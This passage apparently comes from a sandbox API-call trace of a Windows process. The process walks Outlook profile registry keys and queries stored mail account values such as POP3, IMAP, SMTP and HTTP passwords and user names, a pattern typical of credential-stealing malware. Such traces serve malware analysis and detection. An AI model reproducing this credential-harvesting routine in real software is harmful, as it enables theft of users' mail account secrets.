phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.310] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.310] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.310] RegCloseKey (hKey=0x95c) returned 0x0 [0249.311] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.311] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.311] RegCloseKey (hKey=0x95c) returned 0x0 [0249.311] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.311] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.311] RegCloseKey (hKey=0x95c) returned 0x0 [0249.311] LocalFree (hMem=0x5d66960) returned 0x0 [0249.311] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0xc, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="dc184acfc7e1614eb31843d1abdfd43e", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.311] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.311] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d67220 [0249.311] wsprintfA (in: param_1=0x5d67220, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e") returned 88 [0249.311] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.311] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.311] RegCloseKey (hKey=0x95c) returned 0x0 [0249.311] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.311] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.311] RegCloseKey (hKey=0x95c) returned 0x0 [0249.311] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.311] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.311] RegCloseKey (hKey=0x95c) returned 0x0 [0249.311] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.311] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.311] RegCloseKey (hKey=0x95c) returned 0x0 [0249.311] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.312] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.312] RegCloseKey (hKey=0x95c) returned 0x0 [0249.312] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.313] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.313] RegCloseKey (hKey=0x95c) returned 0x0 [0249.313] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.314] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.314] RegCloseKey (hKey=0x95c) returned 0x0 [0249.314] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 